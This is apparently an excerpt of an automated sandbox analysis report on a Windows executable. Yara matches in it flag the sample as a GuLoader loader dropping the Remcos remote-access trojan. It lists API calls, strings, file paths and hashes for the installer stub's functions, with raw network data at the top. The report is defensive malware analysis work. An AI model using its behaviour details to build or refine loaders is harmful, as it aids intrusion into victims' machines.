2025-01-08 14:08:33 UTC	16384	IN	Data Raw: 71 6a 67 b0 bb 4a de 87 1e 20 6b 55 8a c3 3a 35 8a 2a fb 35 f5 e4 c4 cd 5c 9e bf 02 45 16 16 95 93 a8 b3 64 86 62 04 e5 97 02 f5 d0 c8 92 20 64 54 75 4a 48 8f 0f 0c 99 19 c0 df 84 4c 24 19 c4 f5 4b 76 67 5c 80 35 90 e3 20 4a 8f 7f 27 fd 80 69 e6 0d 14 9a c5 e1 84 05 eb bc 2f f1 fd 1e bd fa b3 95 78 a9 28 69 61 77 11 b0 0d 4c b2 a5 1a a3 e9 72 01 52 76 62 a7 4b 74 df 2b db 83 08 14 0f 76 cf 85 9a 7e 87 2e 3f 2e fa 36 60 ae c5 2d 4d 57 17 b8 a2 45 03 a8 45 7c 01 d5 6b 26 d7 30 be 30 5f 24 a4 ab 32 f2 ed c5 ee 40 8e cb 1f 36 ad 59 0c 78 b7 1a d8 67 79 f5 43 a6 61 da e5 05 7b 6a d7 cb 35 b3 2d 1f de e2 b6 1f f2 62 62 6c 5b 6f 9a 19 d7 0d d4 fb 63 88 4a 47 32 2f fb 9a 35 88 d6 41 fe 0a 86 84 db 6d 7f 72 1f 56 38 93 41 aa 09 fc 85 b3 ca 87 63 df 28 8c cf e5 6a Data Ascii: qjgJ kU:5*5\Edb dTuJHL$Kvg\5 J'i/x(iawLrRvbKt+v~.?.6`-MWEE\|k&00_$2@6YxgyCa{j5-bbl[ocJG2/5AmrV8Ac(j
2025-01-08 14:08:33 UTC	16384	IN	Data Raw: 72 3a af 26 62 4c 16 8d 97 2f db 08 04 92 87 02 eb 48 b2 ae 14 96 87 5b 69 ed a9 50 1e 74 14 59 a4 c5 39 dc 71 98 45 48 77 cc 4f d2 e9 b9 fb 14 e0 e7 a8 28 8e 3e 3f 24 11 bf 04 66 6f 38 23 5e 09 73 90 06 53 a1 35 81 b3 58 2e 14 93 11 73 1d c5 c9 bc f6 a6 12 05 7c f9 6b 01 c2 76 d7 2f 9f d2 37 d5 87 9a bb 00 c7 37 0b 36 76 a2 9a 3c f3 58 d5 b9 2e c6 86 cc 65 e0 2f 09 58 10 93 41 42 8b 34 0e a1 a8 4e 8a 14 cd f0 8c 4a f6 8e d2 40 0b 11 c1 ff bb c9 9f 03 75 2f bc 0e 91 40 e1 5f fd 08 81 02 41 71 ea 6a 47 0a fc 4d d2 62 96 27 f3 ef 6f 9c 21 ca c7 0f 88 68 07 66 a5 61 fd 3a c0 5b c9 df d1 4e ce 5b ec 09 68 70 c6 89 7c 19 6b 6d dd 4d 94 00 cb 0a 04 c0 6e 4d 2b c4 df 21 84 3f 0f 94 43 8b ec 52 3d 8d af 87 f2 e2 9e b3 97 18 90 07 3a 3d 78 e6 73 60 eb 47 2a 1b af Data Ascii: r:&bL/H[iPtY9qEHwO(>?$fo8#^sS5X.s\|kv/776v<X.e/XAB4NJ@u/@_AqjGMb'o!hfa:[N[hp\|kmMnM+!?CR=:=xs`G*

Target ID:	0
Start time:	09:08:01
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\KO0q4biYfC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\KO0q4biYfC.exe"
Imagebase:	0x400000
File size:	518'146 bytes
MD5 hash:	DD935B0E91E2E551B21296D8FA186D11
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1350132255.000000000560C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:08:13
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\KO0q4biYfC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\KO0q4biYfC.exe"
Imagebase:	0x400000
File size:	518'146 bytes
MD5 hash:	DD935B0E91E2E551B21296D8FA186D11
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3700597027.0000000006B54000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	21%
Dynamic/Decrypted Code Coverage:	13.3%
Signature Coverage:	19.7%
Total number of Nodes:	1590
Total number of Limit Nodes:	36

Executed Functions

Function 004034A5 Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004034C8
GetVersion.KERNEL32 ref: 004034CE
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
#17.COMCTL32(?,00000006,?,0000000A), ref: 0040353E
OleInitialize.OLE32(00000000), ref: 00403545
SHGetFileInfoW.SHELL32(004216E8,00000000,?,?,00000000), ref: 00403561
GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,?,0000000A), ref: 00403576
CharNextW.USER32(00000000,"C:\Users\user\Desktop\KO0q4biYfC.exe",?,"C:\Users\user\Desktop\KO0q4biYfC.exe",00000000,?,00000006,?,0000000A), ref: 004035AE

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

GetTempPathW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 004036E8
GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000006,?,0000000A), ref: 004036F9
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 00403705
GetTempPathW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 00403719
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 00403721
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 00403732
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 0040373A
DeleteFileW.KERNELBASE(1033,?,00000006,?,0000000A), ref: 0040374E

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5

OleUninitialize.OLE32(00000006,?,00000006,?,0000000A), ref: 00403819
ExitProcess.KERNEL32 ref: 0040383A
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\KO0q4biYfC.exe",00000000,00000006,?,00000006,?,0000000A), ref: 0040384D
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A328,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\KO0q4biYfC.exe",00000000,00000006,?,00000006,?,0000000A), ref: 0040385C
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\KO0q4biYfC.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403867
lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\KO0q4biYfC.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403873
SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 0040388F
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?,?,00000006,?,0000000A), ref: 004038E9
CopyFileW.KERNEL32(C:\Users\user\Desktop\KO0q4biYfC.exe,00420EE8,00000001,?,00000006,?,0000000A), ref: 004038FD
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,?,0000000A), ref: 0040392A
GetCurrentProcess.KERNEL32(?,0000000A,00000006,?,0000000A), ref: 00403959
OpenProcessToken.ADVAPI32(00000000), ref: 00403960
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
AdjustTokenPrivileges.ADVAPI32 ref: 00403998
ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
ExitProcess.KERNEL32 ref: 004039E0

Strings

TMP, xrefs: 00403735
1033, xrefs: 00403749
NSIS Error, xrefs: 00403567
~nsu, xrefs: 00403845
.tmp, xrefs: 00403861
\Temp, xrefs: 004036FF
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004036DD, 004036E2, 004036F8, 00403704, 00403713, 00403720, 0040372C, 00403734, 0040384A, 0040385B, 00403866, 00403872, 0040387F, 0040388E, 0040393F
C:\Users\user\Desktop, xrefs: 0040386C, 00403871, 0040389E
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004034BC
TEMP, xrefs: 0040372D
C:\Users\user\Desktop\KO0q4biYfC.exe, xrefs: 004038F8
"C:\Users\user\Desktop\KO0q4biYfC.exe", xrefs: 0040357C, 00403582, 00403776
C:\Users\user\AppData\Roaming\brugser\brugo, xrefs: 004036CB, 004037EB, 00403895, 0040389F
Error launching installer, xrefs: 004037D0
SeShutdownPrivilege, xrefs: 0040396F
Low, xrefs: 0040371B
UXTHEME, xrefs: 004034F5, 004034FA, 00403500
C:\Users\user\AppData\Roaming\brugser\brugo, xrefs: 004037F6

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\KO0q4biYfC.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\brugser\brugo$C:\Users\user\AppData\Roaming\brugser\brugo$C:\Users\user\Desktop$C:\Users\user\Desktop\KO0q4biYfC.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-2521317436
Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 004055ED
GetDlgItem.USER32(?,000003EE), ref: 004055FC
GetClientRect.USER32(?,?), ref: 00405639
GetSystemMetrics.USER32(00000002), ref: 00405640
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
ShowWindow.USER32(?,?), ref: 004056DC
GetDlgItem.USER32(?,?), ref: 004056FD
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
GetDlgItem.USER32(?,?), ref: 0040560B

Part of subcall function 00404394: SendMessageW.USER32(?,?,00000001,004041BF), ref: 004043A2

GetDlgItem.USER32(?,?), ref: 0040574F
CreateThread.KERNELBASE(00000000,00000000,Function_00005523,00000000), ref: 0040575D
CloseHandle.KERNELBASE(00000000), ref: 00405764
ShowWindow.USER32(00000000), ref: 00405788
ShowWindow.USER32(?,?), ref: 0040578D
ShowWindow.USER32(?), ref: 004057D7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
CreatePopupMenu.USER32 ref: 0040581C
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
GetWindowRect.USER32(?,?), ref: 00405850
TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 00405869
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
OpenClipboard.USER32(00000000), ref: 004058B1
EmptyClipboard.USER32 ref: 004058B7
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
GlobalLock.KERNEL32(00000000), ref: 004058CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
GlobalUnlock.KERNEL32(00000000), ref: 00405901
SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
CloseClipboard.USER32 ref: 00405912

Strings

(7B, xrefs: 0040587D
{, xrefs: 004057F5

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 590372296-525222780
Opcode ID: 25b2fdde4747a09c309382e68ae8746e18b360b2bf61ebef59f775d21e3b13bf
Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
Opcode Fuzzy Hash: 25b2fdde4747a09c309382e68ae8746e18b360b2bf61ebef59f775d21e3b13bf
Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68

Function 73C61B5F Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 73C6121B: GlobalAlloc.KERNELBASE(?,?,73C6123B,?,73C612DF,00000019,73C611BE,-000000A0), ref: 73C61225

GlobalAlloc.KERNELBASE(?,00001CA4), ref: 73C61C6B
lstrcpyW.KERNEL32(00000008,?), ref: 73C61CB3
lstrcpyW.KERNEL32(00000808,?), ref: 73C61CBD
GlobalFree.KERNEL32(00000000), ref: 73C61CD0
GlobalFree.KERNEL32(?), ref: 73C61DB2
GlobalFree.KERNEL32(?), ref: 73C61DB7
GlobalFree.KERNEL32(?), ref: 73C61DBC
GlobalFree.KERNEL32(00000000), ref: 73C61FA6
lstrcpyW.KERNEL32(?,?), ref: 73C62140
GetModuleHandleW.KERNEL32(00000008), ref: 73C621B5
LoadLibraryW.KERNEL32(00000008), ref: 73C621C6
GetProcAddress.KERNEL32(?,?), ref: 73C62220
lstrlenW.KERNEL32(00000808), ref: 73C6223A

Memory Dump Source

Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 8433eb3182cbf622b5fbb1d38c95f9ca14bcc59d435ad4720d1f29feba47fa84
Instruction ID: 97912e9e4c71f98df01c4c47d835157692e1f176a04b3de1a35e7120d1eaf606
Opcode Fuzzy Hash: 8433eb3182cbf622b5fbb1d38c95f9ca14bcc59d435ad4720d1f29feba47fa84
Instruction Fuzzy Hash: 2522B771D0464ADFDB12CFA6C9C47EEB7F9FB04316F11852AD1A7EA280D7709A808B51

Function 00405AFA Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405B23
lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405B6B
lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405B8E
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405B94
FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405BA4
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
FindClose.KERNEL32(00000000), ref: 00405C53

Strings

0WB, xrefs: 00405B53
\*.*, xrefs: 00405B65
"C:\Users\user\Desktop\KO0q4biYfC.exe", xrefs: 00405AFA
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B08

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\KO0q4biYfC.exe"$0WB$C:\Users\user~1\AppData\Local\Temp\$\*.*
API String ID: 2035342205-178022407
Opcode ID: efe765d34b709223bdb1d712638ee5584c001840e8cac4ec9717a6f7e167d989
Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
Opcode Fuzzy Hash: efe765d34b709223bdb1d712638ee5584c001840e8cac4ec9717a6f7e167d989
Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE

Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45

Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,771B2EE0,00405B1A,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00406736
FindClose.KERNEL32(00000000), ref: 00406742

Strings

xgB, xrefs: 0040672C

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

Function 00406943 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45

Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,?), ref: 00402183

Strings

C:\Users\user\AppData\Roaming\brugser\brugo, xrefs: 004021C3

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\brugser\brugo
API String ID: 542301482-2288025642
Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54

Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
ShowWindow.USER32(?), ref: 00403EDF
DestroyWindow.USER32 ref: 00403EF3
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
GetDlgItem.USER32(?,?), ref: 00403F30
